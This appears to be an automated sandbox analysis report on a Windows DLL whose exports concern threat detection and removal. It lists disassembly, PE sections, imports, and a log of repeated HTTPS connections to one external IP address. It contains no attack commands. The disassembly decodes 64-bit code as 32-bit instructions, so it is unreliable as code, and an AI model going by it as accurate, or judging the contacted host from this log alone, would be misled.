    mov eax, esp
    dec esp
    mov dword ptr [eax+20h], ecx
    dec esp
    mov dword ptr [eax+18h], eax
    dec eax
    mov dword ptr [eax+10h], edx
    push ebx
    push esi
    push edi
    inc ecx
    push esi
    dec eax
    sub esp, 38h
    dec ebp
    mov esi, ecx
    dec ecx
    mov ebx, eax
    dec eax
    mov esi, edx
    mov byte ptr [eax-38h], 00000000h
    dec eax
    mov edi, edx
    dec ecx
    imul edi, eax
    dec eax
    add edi, ecx
    dec eax
    mov dword ptr [eax+08h], edi
    dec eax
    mov eax, ebx
    dec eax
    dec ebx
    dec eax
    mov dword ptr [esp+70h], ebx
    dec eax
    test eax, eax
    je 00007F8684E0510Bh
    dec eax
    sub edi, esi
    dec eax
    mov dword ptr [esp+60h], edi
    dec eax
    mov ecx, edi
    dec ecx
    mov eax, esi
    dec eax
    mov edx, dword ptr [0003E71Ch]
    call edx
    jmp 00007F8684E050C9h
    mov byte ptr [esp+20h], 00000001h
    dec eax
    add esp, 38h
    inc ecx
    pop esi
    pop edi
    pop esi
    pop ebx
    ret
    int3
    dec eax
    mov dword ptr [esp+10h], ebx
    dec eax
    mov dword ptr [esp+18h], esi
    dec eax
    mov dword ptr [esp+08h], ecx
    push edi
    inc ecx
    push esi
    inc ecx
    push edi
    dec eax
    sub esp, 50h
    dec ebp
    mov esi, ecx
    Name | Virtual Address | Virtual Size | Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x1fca90 | 0x3bc | .rdata
    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1fce4c | 0xc8 | .rdata
    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x21b000 | 0x3dc80 | .rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x209000 | 0x10650 | .pdata
    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x259000 | 0x5a28 | .reloc
    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1e83e0 | 0x70 | .rdata
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_TLS | 0x1e8600 | 0x28 | .rdata
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1e82a0 | 0x140 | .rdata
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_IAT | 0x145000 | 0x5f8 | .rdata
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
    .text | 0x1000 | 0x14379c | 0x143800 | 3d0b6dc5a907120acd2a7b48d00b2e83 | False | 0.4948032385046368 | data | 6.492820105687993 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .rdata | 0x145000 | 0xb92fc | 0xb9400 | bb96591fd85a5ed81095b5e982a81a6b | False | 0.3853955802968961 | data | 5.754560167815736 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .data | 0x1ff000 | 0x9ed4 | 0x4c00 | e5e06104c62e8c75c19b858e3ee1cbeb | False | 0.21145148026315788 | data | 3.619053235111025 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .pdata | 0x209000 | 0x10650 | 0x10800 | d56b95ed2378ce9c949567aa2dc594c0 | False | 0.4711322206439394 | data | 6.104938474417208 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    _RDATA | 0x21a000 | 0x1f4 | 0x200 | 65c1f4817abba73158ce681a35785c62 | False | 0.5078125 | data | 4.176173183361914 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .rsrc | 0x21b000 | 0x3dc80 | 0x3de00 | c84d88d4f874815287125f69ada14e47 | False | 0.9947324810606061 | data | 7.998012535592944 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .reloc | 0x259000 | 0x5a28 | 0x5c00 | 02ba99b3c0d3324a1bdaf65569abc896 | False | 0.2720788043478261 | data | 5.4317179166648275 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
    RT_VERSION | 0x21b0e8 | 0x2cc | data | English | United States | 0.4790502793296089
    RT_ANICURSOR | 0x21b3b4 | 0x3d74a | data | | | 0.9982480673123525
    RT_MANIFEST | 0x258b00 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
    DLL | Import
    CRYPT32.dll | CertDuplicateCertificateContext, CertFindCertificateInStore, CertFreeCertificateContext, CertOpenStore, CertCloseStore, CertGetCertificateContextProperty, CertEnumCertificatesInStore
    KERNEL32.dll | GetFileAttributesW, SetLastError, GetCurrentThreadId, SetEndOfFile, GetStdHandle, FindNextFileW, FindClose, GetModuleHandleA, GetCurrentDirectoryW, SetEvent, ResetEvent, ReleaseMutex, CreateMutexW, CreateEventW, WaitForMultipleObjects, InitializeCriticalSectionAndSpinCount, TerminateProcess, GetStartupInfoW, GetSystemTimeAsFileTime, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetEnvironmentVariableW, SetEnvironmentVariableW, GetFileType, DeleteFiber, QueryPerformanceCounter, ConvertFiberToThread, GetConsoleMode, SetConsoleMode, ReadConsoleA, ReadConsoleW, WriteConsoleW, HeapSize, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetTimeZoneInformation, SystemTimeToTzSpecificLocalTime, GetLocalTime, GetTickCount, GetFileSize, HeapAlloc, GetProcessHeap, WaitForSingleObject, QueryDosDeviceW, GetLogicalDriveStringsW, FindFirstFileW, HeapFree, GetFileInformationByHandle, WriteFile, ReadFile, GetFileSizeEx, FlushFileBuffers, CreateFileW, GetWindowsDirectoryW, GetCurrentProcess, GetModuleFileNameW, FileTimeToSystemTime, MultiByteToWideChar, WideCharToMultiByte, LocalFree, FormatMessageW, DeleteCriticalSection, DecodePointer, InitializeCriticalSectionEx, VirtualQueryEx, GetModuleHandleW, Module32FirstW, CreateToolhelp32Snapshot, OpenProcess, GetCurrentProcessId, GetLastError, CloseHandle, GetProcAddress, FreeLibrary, LoadLibraryW, GetACP, IsValidCodePage, FindFirstFileExW, GetFullPathNameW, HeapReAlloc, SetStdHandle, EnumSystemLocalesW, GetUserDefaultLCID, IsValidLocale, GetLocaleInfoW, LCMapStringW, CompareStringW, FlsFree, FlsSetValue, FlsGetValue, FlsAlloc, SetFilePointerEx, GetConsoleOutputCP, PeekNamedPipe, GetDriveTypeW, SetConsoleCtrlHandler, ExitProcess, GetModuleHandleExW, EnterCriticalSection, LoadLibraryExW, RtlPcToFileHeader, InterlockedFlushSList, InterlockedPushEntrySList, RtlUnwindEx, RaiseException, OutputDebugStringW, IsDebuggerPresent, InitializeSListHead, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, SleepConditionVariableSRW, WakeAllConditionVariable, AcquireSRWLockExclusive, ReleaseSRWLockExclusive, GetCPInfo, LCMapStringEx, EncodePointer, GetStringTypeW, Sleep, SwitchToThread, LeaveCriticalSection
    USER32.dll | GetProcessWindowStation, MessageBoxW, GetUserObjectInformationW
    ADVAPI32.dll | RegOpenKeyExW, RegQueryValueExW, RegCloseKey, RegEnumKeyExW, CryptAcquireContextW, CryptCreateHash, CryptReleaseContext, CryptDestroyHash, CryptEnumProvidersW, CryptSignHashW, CryptDecrypt, CryptExportKey, CryptGetUserKey, CryptGetProvParam, CryptSetHashParam, CryptDestroyKey, ReportEventW, RegisterEventSourceW, DeregisterEventSource
    OLEAUT32.dll | VariantClear
    PSAPI.DLL | GetProcessImageFileNameW
    bcrypt.dll | BCryptImportKeyPair, BCryptHashData, BCryptDestroyHash, BCryptGenRandom, BCryptCreateHash, BCryptCloseAlgorithmProvider, BCryptFinishHash, BCryptOpenAlgorithmProvider, BCryptVerifySignature, BCryptGetProperty, BCryptDestroyKey
    VERSION.dll | VerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
    WS2_32.dll | recv, WSAGetLastError, WSAStartup, WSACleanup, send, closesocket, WSASetLastError
    Name | Ordinal | Address
    ActionsShim_CancelAllOperations | 1 | 0x180007790
    ActionsShim_Create | 2 | 0x180006560
    ActionsShim_Destroy | 3 | 0x180006650
    ActionsShim_FinishUpdate | 4 | 0x180006b70
    ActionsShim_GetDetectedThreats | 5 | 0x180006d40
    ActionsShim_GetDetectedThreatsV2 | 6 | 0x180006e40
    ActionsShim_GetMajorAPIVersion | 7 | 0x180006540
    ActionsShim_GetMinorAPIVersion | 8 | 0x180006540
    ActionsShim_InitTargetDLL | 9 | 0x180006820
    ActionsShim_IsDLLNewlyLoaded | 10 | 0x180006550
    ActionsShim_PrepareUpdate | 11 | 0x180006a50
    ActionsShim_ProcessPendingActionsAfterReboot | 12 | 0x180007690
    ActionsShim_ProcessThreatActions | 13 | 0x180007490
    ActionsShim_ProcessThreatActionsV2 | 14 | 0x180007590
    ActionsShim_SetLogCallback | 15 | 0x1800066b0
    ActionsShim_SetMaxLogLevel | 16 | 0x180006710
    ActionsShim_ShutdownTargetDLL | 17 | 0x180006950
    ActionsShim_Threat_Delete | 18 | 0x1800073a0
    ActionsShim_Threat_GetBasicData | 19 | 0x180006f40
    ActionsShim_Threat_GetRegValueDeleteData | 20 | 0x180007090
    ActionsShim_Threat_GetRegValueReplaceData | 21 | 0x180007190
    ActionsShim_Threat_GetTxtReplaceData | 22 | 0x1800072a0
    Language of compilation system | Country where language is spoken
    English | United States
    Timestamp | Source Port | Dest Port | Source IP | Dest IP
    Aug 9, 2024 16:17:10.373775005 CEST | 49704 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:10.373816013 CEST | 443 | 49704 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:10.373935938 CEST | 49704 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:10.382693052 CEST | 49704 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:10.382709980 CEST | 443 | 49704 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:10.944720030 CEST | 443 | 49704 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:10.944806099 CEST | 49704 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:11.002454042 CEST | 49704 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:11.002489090 CEST | 443 | 49704 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:11.002935886 CEST | 443 | 49704 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:11.002999067 CEST | 49704 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:11.005474091 CEST | 49704 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:11.005506992 CEST | 49704 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:11.005512953 CEST | 443 | 49704 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:11.389722109 CEST | 443 | 49704 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:11.389838934 CEST | 443 | 49704 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:11.389975071 CEST | 49704 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:11.390266895 CEST | 49704 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:11.390295029 CEST | 443 | 49704 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:11.391802073 CEST | 49705 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:11.391846895 CEST | 443 | 49705 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:11.391931057 CEST | 49705 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:11.392153978 CEST | 49705 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:11.392169952 CEST | 443 | 49705 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:12.102513075 CEST | 443 | 49705 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:12.102682114 CEST | 49705 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:12.103497982 CEST | 49705 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:12.103507996 CEST | 443 | 49705 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:12.105210066 CEST | 49705 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:12.105215073 CEST | 443 | 49705 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:12.714466095 CEST | 443 | 49705 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:12.714560986 CEST | 443 | 49705 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:12.714585066 CEST | 49705 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:12.714648962 CEST | 49705 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:12.714956999 CEST | 49705 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:12.714977026 CEST | 443 | 49705 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:16.918045998 CEST | 49706 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:16.918080091 CEST | 443 | 49706 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:16.918168068 CEST | 49706 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:16.925137043 CEST | 49706 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:16.925157070 CEST | 443 | 49706 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:17.511746883 CEST | 443 | 49706 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:17.511872053 CEST | 49706 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:17.560338974 CEST | 49706 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:17.560368061 CEST | 443 | 49706 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:17.560920954 CEST | 443 | 49706 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:17.560978889 CEST | 49706 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:17.562664986 CEST | 49706 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:17.562691927 CEST | 49706 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:17.562700033 CEST | 443 | 49706 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:17.816792965 CEST | 443 | 49706 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:17.816888094 CEST | 443 | 49706 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:17.816890955 CEST | 49706 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:17.816934109 CEST | 49706 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:17.817183971 CEST | 49706 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:17.817209959 CEST | 443 | 49706 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:17.840605974 CEST | 49707 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:17.840665102 CEST | 443 | 49707 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:17.840760946 CEST | 49707 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:17.841013908 CEST | 49707 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:17.841021061 CEST | 443 | 49707 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:18.376995087 CEST | 443 | 49707 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:18.377068043 CEST | 49707 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:18.377980947 CEST | 49707 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:18.377996922 CEST | 443 | 49707 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:18.380245924 CEST | 49707 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:18.380255938 CEST | 443 | 49707 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:18.630162001 CEST | 443 | 49707 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:18.630250931 CEST | 443 | 49707 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:18.630342960 CEST | 49707 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:18.630366087 CEST | 49707 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:18.630733013 CEST | 49707 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:18.630753040 CEST | 443 | 49707 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:39.754123926 CEST | 49715 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:39.754167080 CEST | 443 | 49715 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:39.754281998 CEST | 49715 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:39.754622936 CEST | 49715 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:39.754637003 CEST | 443 | 49715 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:40.280019999 CEST | 443 | 49715 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:40.280118942 CEST | 49715 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:40.280754089 CEST | 49715 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:40.280762911 CEST | 443 | 49715 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:40.290793896 CEST | 49715 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:40.290810108 CEST | 443 | 49715 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:40.531589031 CEST | 443 | 49715 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:40.531672001 CEST | 443 | 49715 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:40.531714916 CEST | 49715 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:40.531714916 CEST | 49715 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:40.539203882 CEST | 49715 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:40.539222002 CEST | 443 | 49715 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:53.702860117 CEST | 49716 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:53.702920914 CEST | 443 | 49716 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:53.702991962 CEST | 49716 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:53.703299999 CEST | 49716 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:53.703314066 CEST | 443 | 49716 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:54.214163065 CEST | 443 | 49716 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:54.214694977 CEST | 49716 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:54.215291023 CEST | 49716 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:54.215306044 CEST | 443 | 49716 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:54.225455999 CEST | 49716 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:54.225478888 CEST | 443 | 49716 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:54.462589025 CEST | 443 | 49716 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:54.462690115 CEST | 443 | 49716 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:17:54.462757111 CEST | 49716 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:54.462806940 CEST | 49716 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:54.463169098 CEST | 49716 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:17:54.463187933 CEST | 443 | 49716 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:14.592272997 CEST | 49718 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:14.592310905 CEST | 443 | 49718 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:14.592390060 CEST | 49718 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:14.592695951 CEST | 49718 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:14.592709064 CEST | 443 | 49718 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:15.109683990 CEST | 443 | 49718 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:15.109868050 CEST | 49718 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:15.111123085 CEST | 49718 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:15.111140013 CEST | 443 | 49718 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:15.112529039 CEST | 49718 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:15.112538099 CEST | 443 | 49718 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:15.353965044 CEST | 443 | 49718 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:15.354048967 CEST | 443 | 49718 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:15.354195118 CEST | 49718 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:15.354195118 CEST | 49718 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:15.354495049 CEST | 49718 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:15.354521990 CEST | 443 | 49718 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:21.520209074 CEST | 49719 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:21.520256042 CEST | 443 | 49719 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:21.520337105 CEST | 49719 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:21.520626068 CEST | 49719 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:21.520638943 CEST | 443 | 49719 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:22.025659084 CEST | 443 | 49719 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:22.025780916 CEST | 49719 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:22.026439905 CEST | 49719 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:22.026449919 CEST | 443 | 49719 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:22.027864933 CEST | 49719 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:22.027870893 CEST | 443 | 49719 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:22.292073011 CEST | 443 | 49719 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:22.292159081 CEST | 443 | 49719 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:22.292165995 CEST | 49719 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:22.292210102 CEST | 49719 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:22.292526007 CEST | 49719 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:22.292551994 CEST | 443 | 49719 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:45.414813042 CEST | 49720 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:45.414865971 CEST | 443 | 49720 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:45.414961100 CEST | 49720 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:45.415298939 CEST | 49720 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:45.415313005 CEST | 443 | 49720 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:45.943075895 CEST | 443 | 49720 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:45.943238020 CEST | 49720 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:45.943749905 CEST | 49720 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:45.943777084 CEST | 443 | 49720 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:45.945080042 CEST | 49720 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:45.945086002 CEST | 443 | 49720 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:46.188576937 CEST | 443 | 49720 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:46.188649893 CEST | 49720 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:46.188664913 CEST | 443 | 49720 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:46.188705921 CEST | 49720 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:46.188868999 CEST | 49720 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:46.188886881 CEST | 443 | 49720 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:47.324651003 CEST | 49721 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:47.324703932 CEST | 443 | 49721 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:47.324796915 CEST | 49721 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:47.325635910 CEST | 49721 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:47.325651884 CEST | 443 | 49721 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:47.843672991 CEST | 443 | 49721 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:47.843822956 CEST | 49721 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:47.844281912 CEST | 49721 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:47.844290018 CEST | 443 | 49721 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:47.845633984 CEST | 49721 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:47.845638990 CEST | 443 | 49721 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:48.089622021 CEST | 443 | 49721 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:48.089704037 CEST | 443 | 49721 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:18:48.089730978 CEST | 49721 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:48.091041088 CEST | 49721 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:48.091041088 CEST | 49721 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:48.400741100 CEST | 49721 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:18:48.400773048 CEST | 443 | 49721 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:19:07.222328901 CEST | 49722 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:19:07.222383022 CEST | 443 | 49722 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:19:07.222477913 CEST | 49722 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:19:07.222702980 CEST | 49722 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:19:07.222721100 CEST | 443 | 49722 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:19:07.737983942 CEST | 443 | 49722 | 62.192.173.45 | 192.168.2.5
    Aug 9, 2024 16:19:07.741072893 CEST | 49722 | 443 | 192.168.2.5 | 62.192.173.45
    Aug 9, 2024 16:19:07.741518974 CEST | 49722 | 443 | 192.168.2.5 | 62.192.173.45
